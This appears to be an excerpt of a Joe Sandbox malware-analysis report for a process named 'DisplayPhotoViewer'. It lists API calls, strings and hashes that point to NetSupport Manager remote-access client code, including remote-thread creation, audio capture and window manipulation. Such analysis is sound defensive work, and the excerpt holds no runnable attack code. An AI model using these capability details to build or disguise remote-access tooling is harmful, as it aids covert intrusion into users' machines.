                                                                                                    • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102986A
                                                                                                    • wsprintfA.USER32 ref: 110298AE
                                                                                                    • wsprintfA.USER32 ref: 11029915
                                                                                                      • Part of subcall function 110E6B50: wsprintfA.USER32 ref: 110E6BB4
                                                                                                      • Part of subcall function 110E6B50: _malloc.LIBCMT ref: 110E6C33
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                                    • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$set %s=15, e=%d
                                                                                                    • API String ID: 2153351953-2541246523
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(?,?), ref: 1101B1EC
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 1101B21A
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 1101B224
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 1101B238
                                                                                                    • GetStockObject.GDI32(00000011), ref: 1101B249
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1101B25A
                                                                                                    • DrawTextA.USER32(?,00000000,000000FF,?,00000001), ref: 1101B283
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 1101B28E
                                                                                                    • DeleteObject.GDI32(?), ref: 1101B38C
                                                                                                    • EndPaint.USER32(?,?), ref: 1101B39A
                                                                                                      • Part of subcall function 11154210: SetWindowLongA.USER32(?,000000FC,?), ref: 11154256
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?), ref: 11154275
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?), ref: 11154284
                                                                                                      • Part of subcall function 11154210: RemovePropA.USER32(?,00000000), ref: 11154293
                                                                                                    Strings
                                                                                                    • NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2D7
                                                                                                    • picholder w=%d, h=%d, xrefs: 1101B319
                                                                                                    • m_hWnd, xrefs: 1101B205
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B200
                                                                                                    • NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d, xrefs: 1101B2FC
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Object$PropRemove$PaintRectSelect$BeginBrushClientCreateDeleteDrawFillLongSolidStockTextWindow
                                                                                                    • String ID: NSMBmpClass WM_PAINT rcClt L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$NSMBmpClass WM_PAINT rcNew L=%d, T=%d, R=%d, B=%d, W=%d, H=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd$picholder w=%d, h=%d
                                                                                                    • API String ID: 3417689559-267201724
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000001,00000000), ref: 1101B3DE
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B40E
                                                                                                    • LoadLibraryA.KERNEL32(PCIImage.dll), ref: 1101B430
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B452
                                                                                                    • GetProcAddress.KERNEL32(00000000,DecompressPNGToBitmap), ref: 1101B469
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1101B481
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 1101B48A
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 1101B495
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 1101B49E
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 1101B4AD
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1101B4B4
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1101B4BB
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1101B4CF
                                                                                                    • OleLoadPicture.OLEAUT32(00000000,00000000,00000000,111B433C,-0000001C), ref: 1101B4F3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101B51B
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Global$CloseFileHandle$CreateLibraryLoad$AddressAllocDeleteFreeLockObjectPictureProcReadSizeStreamUnlock
                                                                                                    • String ID: DecompressPNGToBitmap$PCIImage.dll
                                                                                                    • API String ID: 2291646601-2375843702
                                                                                                    APIs
                                                                                                    Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: __strdup_free
• String ID: CheckRMLocation, SetChannel to [%s]$CheckRMLocation, check machine key$CheckRMLocation, check user key$CheckRMLocation, opened user key$CheckRMLocation, read [%s] from config$Client$Current Location$CurrentLocation$IsA()$RM user location=%s, assumed roaming$RoomSpec$SOFTWARE\RM\Connect$SOFTWARE\Research Machines\Network Management\Location Chooser$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$wwww
• API String ID: 514621754-745316377
• Opcode ID: 094aa11d7920de598f3639f6fbe1fdb09fb21feaa4c71f7cc8b86dab59549705
• Instruction ID: f894f9c42ac74398f340308f426bfffdded0d61ea92f29c686ed71803bb6083f
• Opcode Fuzzy Hash: 094aa11d7920de598f3639f6fbe1fdb09fb21feaa4c71f7cc8b86dab59549705
• Instruction Fuzzy Hash: A4D17F79E0061B9FDB01DBA4DD90FEEF771BF94308F548064E925A7285EA30B905CBA1

APIs
• GetTickCount.KERNEL32 ref: 110FD944
• EnterCriticalSection.KERNEL32(111E41A4,?,00000000), ref: 110FD95D
• GetTickCount.KERNEL32 ref: 110FD963
• wsprintfA.USER32 ref: 110FD9CD
• LoadLibraryA.KERNEL32(Kernel32.dll,?), ref: 110FDA0F
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 110FDA90
• SetLastError.KERNEL32(00000078), ref: 110FDAA9
• FreeLibrary.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 110FDADD
• GetTickCount.KERNEL32 ref: 110FDB67
• LeaveCriticalSection.KERNEL32(111E41A4,?,00000000), ref: 110FDB70
Strings
• Warning. simap lock held for %d ms, xrefs: 110FDB84
• GetProcessId, xrefs: 110FDA88
• PostMessage WMCLOSE to s%d (%d) ret %d, xrefs: 110FDACB
• Warning. took %d ms to get simap lock, xrefs: 110FD973
• Session\%u\NSMWClass, xrefs: 110FD9C7
• Error. IPC(%s) = %s, xrefs: 110FD9FD
• Kernel32.dll, xrefs: 110FDA0A
Similarity
• API ID: CountTick$CriticalLibrarySection$AddressEnterErrorFreeLastLeaveLoadProcwsprintf
• String ID: Error. IPC(%s) = %s$GetProcessId$Kernel32.dll$PostMessage WMCLOSE to s%d (%d) ret %d$Session\%u\NSMWClass$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
• API String ID: 3106348785-779848922
• Opcode ID: 86eccd3dcc8bbe5ad7dd508ea0a69749aa0b92d0333d239a76ed7c8392cefc5a
• Instruction ID: 99f4b102e8faeac1279891c0d03dbaeac9e4f35d232c2983a8158b9cfc77c23e
• Opcode Fuzzy Hash: 86eccd3dcc8bbe5ad7dd508ea0a69749aa0b92d0333d239a76ed7c8392cefc5a
• Instruction Fuzzy Hash: 32715DB5D0526A9FCB11DF6ADC89A9EFBF5BB44304F5041EAD818A7205DB306E84CF90

APIs
• GetModuleHandleA.KERNEL32(Kernel32,00000001,00000000,?,?,?,110FFA35,00000000,000000FF), ref: 1111D64A
• GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D666
• GetCurrentProcess.KERNEL32(000000FF,00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D66D
• DuplicateHandle.KERNEL32(00000000,?,?,110FFA35,00000000,000000FF), ref: 1111D670
• GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 1111D689
• GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 1111D6A2
• CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,00000000,?), ref: 1111D6C1
• GetLastError.KERNEL32 ref: 1111D6CD
• TerminateProcess.KERNEL32(000000FF,00000000), ref: 1111D6D8
• CloseHandle.KERNEL32(FFFFFFFF,?,?,110FFA35), ref: 1111D73F
• SetLastError.KERNEL32(0000042B,?,?,110FFA35), ref: 1111D74D
Similarity
• API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
• String ID: ExitProcess$Kernel32
• API String ID: 109174691-3456457508
• Opcode ID: 23a8d51ea345469b452a98c265589ef130fb499740f9717dd2427de7f8a4f295
• Instruction ID: 65218dde5bd42fdcb51d43cf6386a31a57d5f45fbc13f4cb54451d2089f49792
• Opcode Fuzzy Hash: 23a8d51ea345469b452a98c265589ef130fb499740f9717dd2427de7f8a4f295
• Instruction Fuzzy Hash: 5531B376E00265ABCF11EFA5D88CA9EFB78EF44764F008069FC14A7248D7749A00CBA0

APIs
  • Part of subcall function 110840C0: IsWindow.USER32(?), ref: 110840DF
  • Part of subcall function 110840C0: IsWindow.USER32(?), ref: 110840ED
• EnableWindow.USER32(00000000,00000000), ref: 1106D18B
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
• CloseHandle.KERNEL32(00000000,1106CFF0,00000001,00000000), ref: 1106D1FA
• _memset.LIBCMT ref: 1106D242
• GetTickCount.KERNEL32 ref: 1106D253
• GetTickCount.KERNEL32 ref: 1106D25C
• GetTickCount.KERNEL32 ref: 1106D275
• Sleep.KERNEL32(?,?,?,00000002), ref: 1106D2B8
• Sleep.KERNEL32(0000000A,?,?,00000002), ref: 1106D30D
• GetTickCount.KERNEL32 ref: 1106D458
  • Part of subcall function 111078A0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110859D,00000000,00000001,?,?,?,?,?,1102F5F3), ref: 111078BE
Similarity
• API ID: CountTick$Window$Sleep_memset$CloseCreateEnableEventHandle_mallocwsprintf
• String ID: $gfff
• API String ID: 891474222-257315895
• Opcode ID: 73106c00dc76d1d4257eeea954cf1a6c419609cae60909211727e184f13de2c6
• Instruction ID: 3ce1ca468c266464a933b74fe3aac4e58979fa80f7d1dee04884b1f6784d7fc2
• Opcode Fuzzy Hash: 73106c00dc76d1d4257eeea954cf1a6c419609cae60909211727e184f13de2c6
• Instruction Fuzzy Hash: 62C1BA70B002159FEB24DF24CC91BAEB7B5FF88304F1085A8E9469B384EB74E981CB51

APIs
• GetSysColor.USER32(00000004), ref: 110035C1
  • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 111388E4
  • Part of subcall function 111388D0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111388F9
  • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 11138901
• CreateSolidBrush.GDI32(00000000), ref: 110035D5
• GetStockObject.GDI32(00000007), ref: 110035E0
• SelectObject.GDI32(?,00000000), ref: 110035EB
• SelectObject.GDI32(?,?), ref: 110035FC
• GetSysColor.USER32(00000010), ref: 1100360C
• GetSysColor.USER32(00000010), ref: 11003623
• GetSysColor.USER32(00000014), ref: 1100363A
• GetSysColor.USER32(00000014), ref: 11003651
• GetSysColor.USER32(00000014), ref: 1100366E
• GetSysColor.USER32(00000014), ref: 11003685
• GetSysColor.USER32(00000010), ref: 1100369C
• GetSysColor.USER32(00000010), ref: 110036B3
• InflateRect.USER32(?,000000FE,000000FE), ref: 110036D0
• Rectangle.GDI32(?,?,00000001,?,?), ref: 110036EA
• SelectObject.GDI32(?,?), ref: 110036FE
• SelectObject.GDI32(?,?), ref: 11003708
• DeleteObject.GDI32(?), ref: 1100370E
Similarity
• API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
• String ID:
• API String ID: 3698065672-0
• Opcode ID: 7ed66bb8cdcb0bb537ec076eaab7952cee7355fcfb9d796600d45c3dd963f3bf
• Instruction ID: 4d4e95ecd8771a61e9dba8b307a509cdf54daa3739b90ba69e486c56b986f4b8
• Opcode Fuzzy Hash: 7ed66bb8cdcb0bb537ec076eaab7952cee7355fcfb9d796600d45c3dd963f3bf
• Instruction Fuzzy Hash: 8E515EB5900209AFD710DFA5CC85EBFF3BCEB98714F104A18FA11A7285D671BA45CBA1

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf
                                                                                                    • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                                                    • API String ID: 2111968516-1286714176
                                                                                                    • Opcode ID: 7848c33d2f1dd5eee98893fe19fa417280a422784794dd45225a42f1a563ba5e
                                                                                                    • Instruction ID: 80bb102356f4f6002972538837eb82f374be09b4d8d51cf3bacdfe9d44a6ccd8
                                                                                                    • Opcode Fuzzy Hash: 7848c33d2f1dd5eee98893fe19fa417280a422784794dd45225a42f1a563ba5e
                                                                                                    • Instruction Fuzzy Hash: 31910975A4026D9FD721CBA8CDC4FDAF3B5EF48744F6041A5E90597280EB70AA41CF61
                                                                                                    APIs
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • _malloc.LIBCMT ref: 1100B2E6
                                                                                                      • Part of subcall function 111583B1: __FF_MSGBANNER.LIBCMT ref: 111583CA
                                                                                                      • Part of subcall function 111583B1: __NMSG_WRITE.LIBCMT ref: 111583D1
                                                                                                      • Part of subcall function 111583B1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110782E,?,?,?,?,1113B312,?,?,?), ref: 111583F6
                                                                                                      • Part of subcall function 1100ABC0: EnterCriticalSection.KERNEL32(000000FF,218EC38C,?,00000000,00000000), ref: 1100AC04
                                                                                                      • Part of subcall function 1100ABC0: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AC22
                                                                                                      • Part of subcall function 1100ABC0: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AC6E
                                                                                                      • Part of subcall function 1100ABC0: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100ACB5
                                                                                                      • Part of subcall function 1100ABC0: CloseHandle.KERNEL32(00000000), ref: 1100ACBC
                                                                                                      • Part of subcall function 1100ABC0: _free.LIBCMT ref: 1100ACD3
                                                                                                      • Part of subcall function 1100ABC0: FreeLibrary.KERNEL32(?), ref: 1100ACEB
                                                                                                      • Part of subcall function 1100ABC0: LeaveCriticalSection.KERNEL32(?), ref: 1100ACF5
                                                                                                    • EnterCriticalSection.KERNEL32(1100CA3A,Audio,DisableSounds,00000000,00000000,218EC38C,?,1100CA2A,00000000,?,1100CA2A,?), ref: 1100B31B
                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CA2A,?), ref: 1100B338
                                                                                                    • _calloc.LIBCMT ref: 1100B369
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CA2A,?), ref: 1100B38F
                                                                                                    • LeaveCriticalSection.KERNEL32(1100CA3A,?,1100CA2A,?), ref: 1100B3C9
                                                                                                    • LeaveCriticalSection.KERNEL32(1100CA2A,?,?,1100CA2A,?), ref: 1100B3EE
                                                                                                    Strings
                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B453
                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B473
                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B330
                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B49C
                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B443
                                                                                                    • DisableSounds, xrefs: 1100B2C2
                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B40E
                                                                                                    • Audio, xrefs: 1100B2C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                    • API String ID: 1843377891-2362500394
                                                                                                    • Opcode ID: ac966c748d7357f23b44cb81e352eff68a997ee5eaa533ed2dce7f2f83584676
                                                                                                    • Instruction ID: b1e1e97fae144edd4203a9076ad24e71a6d414591b72f210e114de8874250fb4
                                                                                                    • Opcode Fuzzy Hash: ac966c748d7357f23b44cb81e352eff68a997ee5eaa533ed2dce7f2f83584676
                                                                                                    • Instruction Fuzzy Hash: 5A51D7B5E04A46AFE700CF65EC80B9EFBA4FF05359F10463AE91993240EB7075508BA1
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 1111D3AA
                                                                                                    • SendMessageA.USER32(?,0000043C,00000000,?), ref: 1111D3C1
                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1111D3F0
                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1111D426
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • OleCreateStaticFromData.OLE32(00000000,111B443C,00000002,?,?,?,?), ref: 1111D532
                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 1111D548
                                                                                                    • _memset.LIBCMT ref: 1111D555
                                                                                                    • CoUninitialize.OLE32 ref: 1111D609
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$BytesLockMessage$ContainedDataDocfileErrorExitFromGlobalInitializeLastObjectProcessSendStaticUninitialize_memsetwsprintf
                                                                                                    • String ID: ..\CTL32\RichInsert.cpp$8$pLockBytes$pOleClientSite$pRichEditOle$pStorage
                                                                                                    • API String ID: 1820880743-4036218486
                                                                                                    • Opcode ID: 7e52a97ff0e08f483bba17ff41f8c181077b7cddba0fd5bdc32626615e8818da
                                                                                                    • Instruction ID: f3ba1b7368a252f8364fa3b899f35c55636661d1b37cf4e092e9675286da1571
                                                                                                    • Opcode Fuzzy Hash: 7e52a97ff0e08f483bba17ff41f8c181077b7cddba0fd5bdc32626615e8818da
                                                                                                    • Instruction Fuzzy Hash: A79118B5E002599FDB50DFA8DC84A9EFBB9FF88308F508569E519AB344DB30A941CF50
                                                                                                    APIs
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,218EC38C), ref: 1102F74A
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • EnumWindows.USER32(Function_0002E890,00000001), ref: 1102F822
                                                                                                    • EnumWindows.USER32(Function_0002E890,00000000), ref: 1102F87C
                                                                                                    • Sleep.KERNEL32(00000014), ref: 1102F88C
                                                                                                    • Sleep.KERNEL32(?), ref: 1102F8C3
                                                                                                      • Part of subcall function 11026B00: _memset.LIBCMT ref: 11026B35
                                                                                                      • Part of subcall function 11026B00: wsprintfA.USER32 ref: 11026B6A
                                                                                                      • Part of subcall function 11026B00: WaitForSingleObject.KERNEL32(?,000000FF), ref: 11026BAF
                                                                                                      • Part of subcall function 11026B00: GetExitCodeProcess.KERNEL32(?,?), ref: 11026BC3
                                                                                                      • Part of subcall function 11026B00: CloseHandle.KERNEL32(?,?), ref: 11026BF5
                                                                                                      • Part of subcall function 11026B00: CloseHandle.KERNEL32(?), ref: 11026BFE
                                                                                                    • Sleep.KERNEL32(0000000A), ref: 1102F8DB
                                                                                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 1102F997
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                                    • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                                    • API String ID: 3887438110-1852639040
                                                                                                    • Opcode ID: 5be34af4ecbbee7d3d8fb2baa3f4bfaac64e2fc434bd065debb32d9bdfe86864
                                                                                                    • Instruction ID: 474caed494a3e01976f2f12646d54c45569c71b6724df196c63e2f002d4d9618
                                                                                                    • Opcode Fuzzy Hash: 5be34af4ecbbee7d3d8fb2baa3f4bfaac64e2fc434bd065debb32d9bdfe86864
                                                                                                    • Instruction Fuzzy Hash: BA91BFB5E0022A9BDB14CF64CC80BAEF7E5AF48748F5441ADD94997340EB70AE41CB92
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(11000000,NSMDisplayImageClass,?), ref: 1113314D
                                                                                                    • GetStockObject.GDI32(00000005), ref: 11133189
                                                                                                    • RegisterClassA.USER32(?), ref: 111331A8
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDisplayImageClass), ref: 111331D1
                                                                                                    • CreateWindowExA.USER32(00000080,NSMDisplayImageClass,LockImage,80000000,?,?,?,00000000,00000000,00000000,11000000,00000000), ref: 11133260
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,00000000), ref: 11133289
                                                                                                    • BringWindowToTop.USER32(00000000), ref: 11133290
                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,00000000), ref: 111332AD
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111332B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
